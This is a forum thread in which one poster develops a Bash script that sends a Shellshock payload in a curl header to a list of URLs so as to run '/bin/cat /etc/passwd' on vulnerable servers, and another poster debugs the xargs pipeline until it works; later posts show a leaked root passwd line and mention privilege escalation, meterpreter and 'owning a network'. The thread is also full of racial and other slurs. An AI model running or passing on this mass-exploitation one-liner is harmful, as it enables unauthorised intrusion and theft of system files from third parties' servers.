
ATTN: Auswitsch Nazi Disneyland

  1. #1
    Sophie Pedophile Tech Support
    I know you're good at Bash so help a nigga out pls



    I has a script that is going to run some bash commands if certain criteria are met. Consider the following:


    #!/bin/bash

    # Hurr durr loop and option parsing logic
    # SNIP

    "Test") # If list is loaded test for shellshock
    if [ "$list" == "" ]
    then
    echo "To test a list of URLs one needs to be supplied via the 'List' option"
    printf "%b \n"
    else
    `cat $list | xargs curl -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" | printf %b \n\n`
    fi

    # SNIP



    Ok see the part where i am telling bash to run shell commands? Contents of list should be passed to curl via xargs, however the curl argument "custom: is essential to the proper way in which i intend to use curl to retrieve the data i want. However this is where a problem arises, backticks tell bash to treat whatever is in between them as shell commands as you know. However the quotation marks are problematic since they escape the backticked area of the code. If i don't add another quotation mark just before the end backtick the rest of the script is treated by bash as if it were shell commands which breaks the script, but if i keep the quotation mark at the end curl doesn't do what i want.

    Also printf /n prints a new line right? I am never sure. Lel.

    So... wut do?




  2. #2
    Sophie Pedophile Tech Support
    I also tried escaping " with backslash but now i get this error message:


    $shellshocker.sh: command substitution: line 32: syntax error near unexpected token `('
    $shellshocker.sh: command substitution: line 32: `cat $list | xargs curl -H \"custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd | printf %b \n'

  3. #3
    Sophie Pedophile Tech Support
    Shameless bump.
  4. #4
    Sophie Pedophile Tech Support
    Ok nigger since you're awol i did some research on all special shell characters in bash i am escaping them all and asked on stack overflow but you know how those niggers get. Anyway, new code:


    `cat $list | xargs curl -H \"custom:\(\) \{ ignored; \}\; echo Content-Type: text/html\; echo \; /bin/cat /etc/passwd | printf %b \n`


    This is the output from curl:


    curl: (3) [globbing] unmatched brace at pos 2
    % Total % Received % Xferd Average Speed Time Time Time Current
    Dload Upload Total Spent Left Speed
    0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0curl: (6) Could not resolve host: ignored
    100 12037 0 12037 0 0 10421 0 --:--:-- 0:00:01 --:--:-- 19254
    100 5722 0 5722 0 0 6113 0 --:--:-- --:--:-- --:--:-- 8341


    Also see how it's attempting to resolve the host "ignored"; that's bullshit and not what i want. I want xargs to pass a url as the first argument to curl, why is it not doing that?

    But that's not all, i get error messages as well, see the following.


    $shellshocker.sh: line 32: };: command not found
    $shellshocker.sh: line 32: <!DOCTYPE: command not found


    bby pls, i need you so much right nao ;_;
  5. #5
    F.E. Allen P-TRANNY
    Posting from my dev account because fucking vb lets admins insert arbitrary html and it's fucking things up. Anyway.

    The nice thing about bash is it has a really good repl, even if we never think of it like that, so punching stuff into the command line to test step-by-step works well. So let's assume xargs is working right, we would expect curl to be invoked with urls repeatedly, so let's start from there:

    [lanny:~]$ curl "http://niggasin.space/" -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"
    <!DOCTYPE html>

    <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->

    <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->

    <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->

    <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->

    <head>

    <title>Access denied | niggasin.space used CloudFlare to restrict access</title>

    <meta charset="UTF-8" />

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />


    Well that works, now let's try to tack on the printf:

    [lanny:~]$ curl "http://niggasin.space/" -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" | printf "%b \n\n"
    % Total % Received % Xferd Average Speed Time Time Time Current

    Dload Upload Total Spent Left Speed

    100 3467 0 3467 0 0 101k 0 --:--:-- --:--:-- --:--:-- 102k

    (23) Failed writing body

    [lanny:~]$


    Well that's interesting, let us contemplate the man page:

    [lanny:~]$ man -P cat printf                                                                                                          

    PRINTF(1) BSD General Commands Manual PRINTF(1)

    NAME
    printf -- formatted output

    SYNOPSIS
    printf format [arguments ...]

    DESCRIPTION
    The printf utility formats and prints its arguments, after the first, under control of the format. The format is a
    character string which contains three types of objects: plain characters, which are simply copied to standard out-
    put, character escape sequences which are converted and copied to the standard output, and format specifications,
    each of which causes printing of the next successive argument.



    My emphasis added. printf operates on its arguments as opposed to stdin, which means it can't take input from a pipe on its own (pipes take stdout of the left hand side and feed it to stdin of the right). The distinction may seem trivial but it's important to understand and is the main reason we have xargs (you can think of xargs as a utility for transforming stdin into arguments) so let's try that:

    [lanny:~]$ curl "http://niggasin.space/" -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" | xargs printf "%b NIGGA\n"      
    % Total % Received % Xferd Average Speed Time Time Time Current
    Dload Upload Total Spent Left Speed
    100 3467 0 3467 0 0 105k 0 --:--:-- --:--:-- --:--:-- 105k
    <!DOCTYPE NIGGA
    html> NIGGA
    <!--[if NIGGA
    lt NIGGA
    IE NIGGA
    7]> NIGGA
    <html NIGGA
    class=no-js ie6 oldie NIGGA
    lang=en-US> NIGGA


    Changed printf to be `printf "%b NIGGA\n"` just because that's easier to identify than a newline. So we're getting closer but I'm assuming you were trying to put a double newline between the result of each request rather than just at the end of each line. To do that we need to get a little trickier, let's try:

    [lanny:~]$ echo "http://niggasin.space/\nhttp://yahoo.com/" | xargs -t -I % bash -c 'curl % -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'
    bash -c curl http://niggasin.space/ -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----
    <!DOCTYPE html>
    <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
    <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
    <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
    <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
    <head>
    <title>Access denied | niggasin.space used CloudFlare to restrict access</title>
    <meta charset="UTF-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />
    <meta name="robots" content="noindex, nofollow" />
    <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1" />
    <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />
    <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
    <style type="text/css">body{margin:0;padding:0}</style>
    <!--[if lte IE 9]><script type="text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script><![endif]-->
    <!--[if gte IE 10]><!--><script type="text/javascript" src="/cdn-cgi/scripts/zepto.min.js"></script><!--<![endif]-->
    <script type="text/javascript" src="/cdn-cgi/scripts/cf.common.js"></script>

    </head>
    <body>
    <div id="cf-wrapper">
    <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
    <div id="cf-error-details" class="cf-error-details-wrapper">
    <div class="cf-wrapper cf-header cf-error-overview">
    <h1>
    <span class="cf-error-type" data-translate="error">Error</span>
    <span class="cf-error-code">1012</span>
    <small class="heading-ray-id">Ray ID: 257e65cd668011d1 &bull; 2015-12-20 21:21:34 UTC</small>
    </h1>
    <h2 class="cf-subheadline" data-translate="error_desc">Access denied</h2>
    </div><!-- /.header -->

    <section></section><!-- spacer -->

    <div class="cf-section cf-wrapper">
    <div class="cf-columns two">
    <div class="cf-column">
    <h2 data-translate="what_happened">What happened?</h2>
    <p>The owner of this website (niggasin.space) has forbidden your access based on malicious activity detected from your computer or your network (73.222.180.57). The most likely cause of this is a virus or malware infection on your machine. Please update your anti-virus software and run a full system scan.</p>
    </div>


    </div>
    </div><!-- /.section -->

    <div class="cf-error-footer cf-wrapper">
    <p>
    <span class="cf-footer-item">CloudFlare Ray ID: <strong>257e65cd668011d1</strong></span>
    <span class="cf-footer-separator">&bull;</span>
    <span class="cf-footer-item"><span data-translate="your_ip">Your IP</span>: 73.222.180.57</span>
    <span class="cf-footer-separator">&bull;</span>
    <span class="cf-footer-item"><span data-translate="performance_security_by">Performance &amp; security by</span> <a data-orig-proto="https" data-orig-ref="www.cloudflare.com/5xx-error-landing?utm_source=error_footer" id="brand_link" target="_blank">CloudFlare</a></span>

    </p>
    </div><!-- /.error-footer -->


    </div><!-- /#cf-error-details -->
    </div><!-- /#cf-wrapper -->

    <script type="text/javascript">
    window._cf_translation = {};


    </script>

    </body>
    </html>
    ----END OF RESPONSE----
    bash -c curl http://yahoo.com/ -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----
    <HTML>
    <HEAD>
    <TITLE>Error</TITLE>
    </HEAD>

    <BODY BGCOLOR="white" FGCOLOR="black">
    <!-- status code : 301 -->
    <!-- Error: GET -->
    <!-- host machine: ir13.fp.ne1.yahoo.com -->
    <!-- timestamp: 1450646494.000 -->
    <!-- url: http://yahoo.com/-->
    <H1>Error</H1>
    <HR>

    <FONT FACE="Helvetica,Arial"><B>
    Description: Could not process this "GET" request.
    </B></FONT>
    <HR>
    </BODY>
    ----END OF RESPONSE---


    There we go, so let's look at why that works, here's our command:

    echo "http://niggasin.space/\nhttp://yahoo.com/" | xargs -I % bash -c 'curl % -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'


    So the left side of that pipe is just producing something for xargs to chew on. The "-t" flag just says "show me the command you're about to execute before you do it", which is why we see things like "bash -c curl http://yahoo.com/ -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----" in the output. You'll probably want to pull that flag out when using it, it's mostly for debugging. The "-I %" flag says "replace every instance of '%' that occurs in the strings passed to xargs with the args formed from stdin". So what we want to do for each line of input is execute two commands, one for curl and one to insert our end of response marker. The idea of piping the output of xargs to printf was a good idea but just by nature of the execution model xargs doesn't indicate the difference between one invocation of its command and the next, it just produces a continuous stream, so with your original command printf would only be invoked once rather than once per execution of curl. So what we do here is execute "bash -c" which is just "start bash, run the command following -c, and exit" and is generally how you go from commands you build as strings to execution. So anyway, xargs does the % replace thing and then we run bash, which in turn runs curl and echo, then xargs moves onto the next item and does it all over again. Notice the single quote just before curl and its pair at the end, in bash-like shells single quotes are used for non-interpolated strings, so things like $VAR don't happen, you can use double quotes without escaping them, so on and so forth. Useful when you're writing a string with syntax the (top level) shell would otherwise try to parse.

    There are probably other, probably better ways of doing this but it works as a one-liner so there you go. Would be interested if aldra has anything cleverer or cleaner (I've always felt like invoking sub-shells is kind of a kludge but I see it often enough that I think it's accepted as common practice).
  6. #6
    Lanny Bird of Courage
    Ok nigger since you're awol i did some research on all special shell characters in bash i am escaping them all and asked on stack overflow but you know how those niggers get. Anyway, new code:


    `cat $list | xargs curl -H \"custom:\(\) \{ ignored; \}\; echo Content-Type: text/html\; echo \; /bin/cat /etc/passwd | printf %b \n`


    This is the output from curl:


    curl: (3) [globbing] unmatched brace at pos 2
    % Total % Received % Xferd Average Speed Time Time Time Current
    Dload Upload Total Spent Left Speed
    0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0curl: (6) Could not resolve host: ignored
    100 12037 0 12037 0 0 10421 0 --:--:-- 0:00:01 --:--:-- 19254
    100 5722 0 5722 0 0 6113 0 --:--:-- --:--:-- --:--:-- 8341


    Also see how it's attempting to resolve the host "ignored" that's bullshit and not what i want i want xargs to pass a url as the first argument to curl, why is it not doing that?

    But that's not all i get error messages as well, see the following.


    $shellshocker.sh: line 32: };: command not found
    $shellshocker.sh: line 32: !DOCTYPE: command not found


    bby pls, i need you so much right nao ;_;

    Different problem here, the escaping wasn't your problem to start with but it's causing problems here. Consider the following commands:

    [lanny:~]$ echo "foobar"                                                       
    foobar
    [lanny:~]$ echo \"foobar\"
    "foobar"


    So normally your shell uses the double quote to indicate the start of a string, meaning any spaces following it are not to be treated as additional arguments so like `echo foo bar` invokes echo with two arguments while `echo "foo bar"` invokes it with one. When you escape a double quote (put a \ in front of it) it means "this is literally a backquote, it has no meaning to you (the shell)". So when you do `curl -H "custom:\(\)` you're saying invoke curl with two arguments, the second of which is literally:

    [lanny:~]$ echo \"custom:\(\) | hexdump                                        
    0000000 22 63 75 73 74 6f 6d 3a 28 29 0a
    000000b


    so the first byte of the second argument is 0x22 or the quote character under ascii/utf-8. This causes problems because the next semi-colon is read as a special character in bash, it says "execute the command on the left of the semicolon, and then the one on the right" a lot like "&&" does except "&&" requires the first command to exit normally, otherwise it won't run the next command. Anyway, this means your shell will try to run "curl -H "custom:\(\) \{ ignored" which may or may not be a valid invocation of curl and then it's going to try to run the "{;" command which I don't think is a thing.
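An added example, not code from the thread, showing the two mechanisms posts #5 and #6 explain: printf formats its arguments rather than reading stdin, `xargs -I` runs a compound `sh -c` command once per input line, and an escaped double quote is a literal byte that no longer groups an argument. The URLs are constructed placeholders and nothing is fetched; an `echo` stands in for curl, and the URL is handed to `sh -c` as `$1` instead of being pasted into the command text, so an input line containing quotes or semicolons cannot be parsed as shell syntax.

```shell
# Constructed input: two placeholder URLs, one per line (the "list" file).
url_list() {
  printf '%s\n' 'http://example.invalid/one' 'http://example.invalid/two'
}

# Broken pattern from post #1: printf formats its ARGUMENTS, not stdin, so the
# piped data is never read and only the bare format (a newline) is printed.
pipe_into_printf() {
  url_list | printf '%b\n'
}

# Working pattern from post #5: xargs -I runs the command once per line and
# sh -c executes a compound command (fetch + end marker) for each one.
# The URL arrives as $1 via the trailing "_ %" rather than inside the quoted
# script, so shell metacharacters in a URL stay data instead of becoming code.
# "echo <body for ...>" stands in for the curl call; no network is used.
fetch_each() {
  url_list | xargs -I % sh -c 'echo "<body for $1>"; echo "----END OF RESPONSE----"' _ %
}

# One marker per URL is what the thread was after; count them.
count_markers() {
  fetch_each | grep -c -- '----END OF RESPONSE----'
}

# Quoting demo from post #6: a backslash-escaped quote is a literal 0x22 byte,
# so the shell still splits the rest on whitespace (two arguments), whereas a
# real double-quoted string is delivered as a single argument.
count_args() { echo "$#"; }
escaped_quote_args() { count_args \"custom:\(\) ignored\"; }
double_quoted_args() { count_args "custom:() ignored"; }
```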
  7. #7
    Sophie Pedophile Tech Support
    Thanks that cleared a lot up but you talk so technical it's hard to follow sometime lol it was ok this time though i just needed to focus i had my mind on other cyber stuff when reading as you'll read below. But i suppose that's the nature of the topic here. I will blatantly steal your code and you will love me for it, and i love you for the excellent explanation as usual, breh.

    I'll report any results. By the by, i am currently trying to priv-esc on a unix server and i have been at it for 6 hours straight JESUS FUCKING CHRIST i need a break, for some reason python never works so i can't use PyCat as an alternative to netcat to push a meterpreter through, and even then metasploit is messing with me the bind shell was acting weird. Generated fine and all but i think i need to configure it better. Anywhore i know you're not a sec guy just felt like venting. Thanks again brah.
  8. #8
    Sophie Pedophile Tech Support
    Hmm, no errors but unexpected output.


    Please enter your choice: 3
    % Total % Received % Xferd Average Speed Time Time Time Current
    Dload Upload Total Spent Left Speed
    100 44169 0 44169 0 0 18875 0 --:--:-- 0:00:02 --:--:-- 18997
    % Total % Received % Xferd Average Speed Time Time Time Current
    Dload Upload Total Spent Left Speed
    100 6965 0 6965 0 0 5872 0 --:--:-- 0:00:01 --:--:-- 5872
    /c/PentestBox/bin/shellshocker.sh: line 33: root:x:0:0:root:/root:/bin/bash: No such file or directory
  9. #9
    Lanny Bird of Courage
    Hmm, what are the contents of line 33? Is it the line that does `bash -c "...`? You could try using "sh" instead of "bash" which is the normal way of doing things but I usually use zsh so if I want bash proper I've got to do "bash" instead of "sh".
  10. #10
    Sophie Pedophile Tech Support
    I'll get back to you on this tomorrow i gotta go to bed i'm about to pass out from the oxycodone anyway,
  11. #11
    Malice Naturally Camouflaged
    I'll get back to you on this tomorrow i gotta go to bed i'm about to pass out from the oxycodone anyway,

    Remember to sleep on your side.
  12. #12
    Remember to sleep on your side.

    aww
  13. #13
    Sophie Pedophile Tech Support
    Remember to sleep on your side.

    Thanks bby, but i wasn't even close to an OD or nauseous had about 130mg, spread over a few hours which is a reasonable dose for me given the chronic tolerance i developed during my fentanyl junkie times.
  14. #14
    Sophie Pedophile Tech Support
    Hmm, what are the contents of line 33? Is it the line that does `bash -c "…`? You could try using "sh" instead of "bash" which is the normal way of doing things but I usually use zsh so if I want bash proper I've got to do "bash" instead of "sh".

    ok i have returned, currently the contents of line 33 in my script is:


    `cat $list | xargs -0 bash -c 'curl -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'`
  15. #15
    Lanny Bird of Courage
    So yeah, maybe "bash" isn't on your path or aliased or whatever. Try this and see if anything changes:

    `cat $list | xargs -0 sh -c 'curl -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'`


    Also this is going to sound dumb but you should verify that you can run cat, xargs, sh, and echo each on their own.
  16. #16
    Sophie Pedophile Tech Support
    So yeah, maybe "bash" isn't on your path or aliased or whatever. Try this and see if anything changes:

    `cat $list | xargs -0 sh -c 'curl -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'`


    Also this is going to sound dumb but you should verify that you can run cat, xargs, sh, and echo each on their own.

    Looks like maybe now xargs isn't working,

    `cat $list | xargs -0 sh -c 'curl -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'`
    curl: no URL specified! curl: try 'curl --help' or 'curl --manual' for more information

    When this runs.
  17. #17
    Lanny Bird of Courage
    Oh, I see, the xargs flags need to be changed per my first post itt, should have noticed that when you posted the line before. So the xargs invocation looks like:

    xargs -I % bash -c 'curl % -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'


    without the "-I %" and "curl %" xargs will try to add the url as an additional command to bash rather than curl. You can leave this -0 out, I think -I implies it.
  18. #18
    Sophie Pedophile Tech Support
    Oh, I see, the xargs flags need to be changed per my first post itt, should have noticed that when you posted the line before. So the xargs invocation looks like:

    xargs -I % bash -c 'curl % -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'


    without the "-I %" and "curl %" xargs will try to add the url as an additional command to bash rather than curl. You can leave this -0 out, I think -I implies it.

    Booyah

    cat $list | xargs -I % bash -c 'curl % -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'


    Working code, now i'll add an option to save output to an outfile as well because the amount of output can be pretty crazy.

    Thanks lan as usual you rock. Also remember a little while ago in T&T in a thread i made about owning a network through shellshock as well, that i wasn't getting output from my PyCat python net tool because it remains scanning until CTRL+C is sent and the script catches an exception and only then calls my usage function? You said the CGI model of execution requires the process to be completed within a certain time frame for it to properly buffer and send output back right? I improved my original scanner by adding a timer for the main loop.


    import time

    # SNIP

    try:
        start = time.time()
        while (time.time() - start < 15): # Main loop starts here.

    # SNIP


    Now we'll never have problems with the process taking too long to complete, and on a local network a normal scan of the entire subnet should not take more than a few seconds but i gave the script 15 as a margin.

    So i'll be finishing up my bash script and posting it to T&T and github later on.